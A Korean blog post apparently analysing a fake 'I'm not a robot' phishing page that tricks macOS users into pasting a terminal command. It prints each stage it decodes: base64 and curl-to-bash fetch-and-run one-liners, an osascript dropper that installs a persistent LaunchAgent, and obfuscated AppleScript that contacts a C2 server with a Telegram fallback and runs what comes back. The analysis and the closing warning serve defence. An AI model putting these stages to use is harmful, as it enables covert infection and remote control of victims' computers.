I'm not a robot 피싱

어떤 웹 사이트에서 로봇이 아닌걸 증명해야 한다고 터미널에서 무언가 실행하라고 하길래 무슨 동작을할까 싶어서 살짝 찍먹해봤다.

 

 

 

echo "Y3VybCAtcyAnaHR0c***[REMOVED]***2gnIHwgYmFzaA==" | base64 -d | bash

 

복사된 내용은 위와 같았고, base64로 인코딩된 문자열을 디코딩하여 bash 쉘로 실행해주는 역할을 하는데 디코딩하게되면 다음과 같은 내용이 나온다.

 

curl -s 'https://***[REMOVED]***.digital/script.sh' | bash

 

마찬가지로 curl의 -s 옵션을 줬는데 slient mode로 output을 출력하지 않고 해당 script.sh를 다운로드 받아 bash 쉘로 실행하며 실행되는 내용은 다음과 같다.

 

osascript -e "$(echo "ZG8gc2hlbGwgc2***[REMOVED]***+DQo8L3BsaXN0Pg0=" | base64 -d)"

 

osascript(AppleScript)의 -e(execute) 옵션을 사용해 base64로 인코딩된 무언가를 디코딩한 후 실행한다.

 

do shell script "
SCRIPT_PATH=\"$HOME/Library/jaqyeseegglnlxbj\";
mkdir -p \"$HOME/Library/LaunchAgents\";
cat > \"$HOME/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist\" <<END_PLIST
<?xml version=\"1.0\" encoding=\"UTF-8\"?>
<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">
<plist version=\"1.0\">
  <dict>
    <key>Label</key>
    <string>com.jaqyeseegglnlxbj</string>
    <key>KeepAlive</key>
    <true/>
    <key>RunAtLoad</key>
    <true/>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/bash</string>
        <string>-c</string>
        <string>echo 'c2V0IF9xV3NNWVQ0eiB0***[REMOVED]***gplbmQgaWY=' | base64 -d | osascript</string>
    </array>
  </dict>
</plist>
END_PLIST
"
do shell script "launchctl unload ~/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist 2>/dev/null"
do shell script "launchctl load ~/Library/LaunchAgents/com.jaqyeseegglnlxbj.plist"

데몬 등록해서 컴퓨터가 켜질때 자동으로 바이너리가 실행될 수 있도록 하는데, bash쉘로 c(command)옵션을 줘서 base64로 인코딩된 문자열을 디코딩한 후 다시 osascript로 실행하는 역할을 한다.

 

set _qWsMYT4z to "hqCnS8YTVCQx0"
set _m2i0igRQy to "XtiNS5rmLuWcE"
set __xbFfmLcXA to (475 + 350) * 7
set __wb3jlMkzPTd to 168.2011
property ***[REMOVED]*** : {((character id 112) & ***[REMOVED]*** & (ASCII character 99) & "f" & "d")}
property ***[REMOVED]***: ""
property ***[REMOVED]***: ("f0" & ***[REMOVED]*** & (ASCII character 100) & (character id 101) & (character id 52) & "a" & "9" & (character id 54) & (character id 50) & (character id 48) & (ASCII character 50) & (character id 57) & "b66" & "ed" & (character id 56) & (character id 53) & (ASCII character 101))
property ***[REMOVED]*** : ""

on __ORuyqOlns5()
    repeat with _PfgtcEkdQ in __Ec0tcgIh
        set _cMKkcc1N to (contents of _PfgtcEkdQ)
        set __kSC4ZSAG7 to ((ASCII character 104) & "t" & (ASCII character 116) & "p" & (ASCII character 58) & (ASCII character 47) & (character id 47)) & _cMKkcc1N & (character id 47)
        try
            set __apV8lF0 to do shell script (***[REMOVED]***) & (character id 49) & "0 ") & quoted form of __kSC4ZSAG7
            if __apV8lF0 is ("s" & "u" & "c" & (character id 99) & "e" & "s" & (ASCII character 115)) then
                set __gXHhFRhSUW to ***[REMOVED]***
                return true
            end if
        end try
    end repeat
    try
        set _cMKkcc1N to ***[REMOVED]***(ASCII character 108) & (character id 32) & "-" & (character id 115) & (ASCII character 32) & "-" & (character id 45) & "co" & (character id 110) & "n" & (ASCII character 101) & (character id 99) & (character id 116) & (ASCII character 45) & (ASCII character 116) & (ASCII character 105) & "m" & (ASCII character 101) & (ASCII character 111) & "ut" & " " & (ASCII character 53) & (ASCII character 32) & (ASCII character 45) & "-" & (ASCII character 109) & "a" & (ASCII character 120) & "-" & (ASCII character 116) & (ASCII character 105) & (ASCII character 109) & (character id 101) & (ASCII character 32) & (ASCII character 49) & (ASCII character 48) & (ASCII character 32) & (ASCII character 104) & (character id 116) & "tps" & (ASCII character 58) & (character id 47) & "/" & "t." & (ASCII character 109) & (ASCII character 101) & "/" & "ax0" & "3b" & "o" & (ASCII character 116) & " | " & (character id 115) & (character id 101) & (character id 100) & (character id 32) & "-n " & (character id 39) & (ASCII character 115) & (ASCII character 47) & (ASCII character 46) & (character id 42) & "<" & (ASCII character 115) & "p" & "a" & (ASCII character 110) & " " & (character id 100) & (ASCII character 105) & (character id 114) & (character id 61) & (character id 34) & (character id 97) & (ASCII character 117) & "to" & (character id 34) & (character id 62) & (character id 92) & (ASCII character 40) & (ASCII character 91) & "^" & (character id 60) & (ASCII character 93) & (ASCII character 42) & (character id 92) & (character id 41) & "<" & (ASCII character 92) & (ASCII character 47) & (ASCII character 115) & (ASCII character 112) & (character id 97) & (character id 110) & ">" & "." & "*/" & (character id 92) & "1/" & (ASCII character 112) & (character id 39))
        set __kSC4ZSAG7 to (string id {104, 116, 116, 112, 58, 47, 47}) & _cMKkcc1N & (character id 47)
        set __apV8lF0 to do shell script ("/" & ***[REMOVED]*** & (ASCII character 117) & (character id 114) & (character id 108) & " " & (ASCII character 45) & (ASCII character 115) & " " & (ASCII character 45) & (character id 72) & (character id 32)) & quoted form of _c7Y0vxsS1J & (" " & "-" & (ASCII character 100) & (character id 32) & (ASCII character 34) & (character id 99) & "h" & (character id 101) & (ASCII character 99) & (character id 107) & (ASCII character 34) & " --" & "c" & "onn" & (ASCII character 101) & (ASCII character 99) & "t-t" & "ime" & "out" & (character id 32) & "5" & (character id 32) & (character id 45) & "-" & (ASCII character 109) & (character id 97) & "x" & (ASCII character 45) & "ti" & (ASCII character 109) & (character id 101) & (ASCII character 32) & (ASCII character 49) & "0" & (ASCII character 32)) & quoted form of __kSC4ZSAG7
        if __apV8lF0 is ((ASCII character 115) & "ucc" & (character id 101) & (character id 115) & (character id 115)) then
            set __gXHhFRhSUW to __kSC4ZSAG7
            return true
        end if
    end try
    return false
end __ORuyqOlns5

set _c7Y0vxsS1J to ((ASCII character 85) & (ASCII character 115) & (ASCII character 101) & "r-" & (ASCII character 65) & (ASCII character 103) & "e" & (character id 110) & "t: " & (character id 77) & (character id 111) & "zil" & (ASCII character 108) & (ASCII character 97) & (ASCII character 47) & (character id 53) & (ASCII character 46) & (ASCII character 48) & (ASCII character 32) & (character id 40) & "Mac" & "in" & (character id 116) & (ASCII character 111) & (character id 115) & "h" & ";" & (character id 32) & (ASCII character 73) & (character id 110) & "t" & "el" & (character id 32) & (ASCII character 77) & (character id 97) & (ASCII character 99) & " " & (character id 79) & "S" & (character id 32) & (character id 88) & " " & "1" & (character id 48) & (ASCII character 95) & "1" & (character id 53) & (ASCII character 95) & (ASCII character 55) & (ASCII character 41) & " A" & (character id 112) & (character id 112) & (ASCII character 108) & "e" & (ASCII character 87) & (ASCII character 101) & (character id 98) & (ASCII character 75) & (ASCII character 105) & (character id 116) & (ASCII character 47) & (ASCII character 53) & (character id 51) & (ASCII character 55) & (ASCII character 46) & (ASCII character 54) & (character id 55) & " " & (ASCII character 40) & (ASCII character 75) & (character id 72) & (ASCII character 84) & (character id 77) & (ASCII character 76) & (character id 44) & (character id 32) & (character id 108) & (character id 105) & (ASCII character 107) & (ASCII character 101) & (ASCII character 32) & "Gec" & "k" & (ASCII character 111) & (character id 41) & (character id 32) & "C" & (character id 104) & (character id 114) & "o" & (character id 109) & "e/1" & (ASCII character 52) & "5" & (character id 46) & (character id 49) & (ASCII character 46) & (character id 52) & (character id 46) & "1" & "1" & " " & (ASCII character 83) & (character id 97) & "f" & (ASCII character 97) & (ASCII character 114) & (character id 105) & (ASCII character 47) & (character id 53) & "37" & "." & "67")

if __ORuyqOlns5() then	
	set __Oxs1TXRuMan to (string id {99, 117, 114, 108, 32, 45, 115, 32, 45, 45, 99, 111, 110, 110, 101, 99, 116, 45, 116, 105, 109, 101, 111, 117, 116, 32, 53, 32, 45, 45, 109, 97, 120, 45, 116, 105, 109, 101, 32, 49, 48, 32, 45, 45, 114, 101, 116, 114, 121, 32, 51, 32, 45, 45, 114, 101, 116, 114, 121, 45, 100, 101, 108, 97, 121, 32, 50, 32}) & ((ASCII character 45) & (ASCII character 88) & (ASCII character 32) & (ASCII character 80) & (ASCII character 79) & (character id 83) & (ASCII character 84) & (character id 32)) & quoted form of __gXHhFRhSUW & (character id 32) & ((ASCII character 45) & (ASCII character 72) & (character id 32)) & quoted form of _c7Y0vxsS1J & (character id 32) & ((ASCII character 45) & (ASCII character 100) & (character id 32)) & quoted form of (((character id 116) & (ASCII character 120) & (ASCII character 105) & (character id 100) & (character id 61)) & _bHwoo7HIuGJ & ((character id 38) & (character id 98) & "m" & "o" & (ASCII character 100) & "ul" & (ASCII character 101))) & ((character id 32) & (character id 124) & (character id 32) & "o" & (ASCII character 115) & (character id 97) & (character id 115) & (character id 99) & "rip" & (character id 116))
    set __v8kRbKEqefd to do shell script __Oxs1TXRuMan
end if

최종적으로 위와 같은 애플스크립트가 나오며 다음과 같은 행동을 한다.

 

1) __Ec0tcgIh 함수에서는 C2 도메인을 구해온 후 연결시도

 -> C2 서버로 요청하고 응답 성공하는 경우 C2 URL을 받아오고, 실패하는 경우 텔레그램 봇을 통해 대체 도메인 받아 C2 서버를 셋팅함(Fallback C2)

2) _bHwoo7HIuGJ의 경우 트랜잭션 ID를 구함

3) _c7Y0vxsS1J에서는 User-Agent를 만든다.

 

 

결과적으로는 C 서버로부터 데이터를 전달받아 애플 스크립트로 무언가를 실행하는데, C2 서버 도메인 몇번 들락날락 했더니 CF에서 차단함...

 

 

 

결론은 복붙 조심하자!

 

웹페이지에서는 fetch("https://www.naver.com/favicon.ico");라고 써있어서 복사하기 했는데, 실제로는 저런 악성코드를 직접 실행할 수도 있으니까 말이다.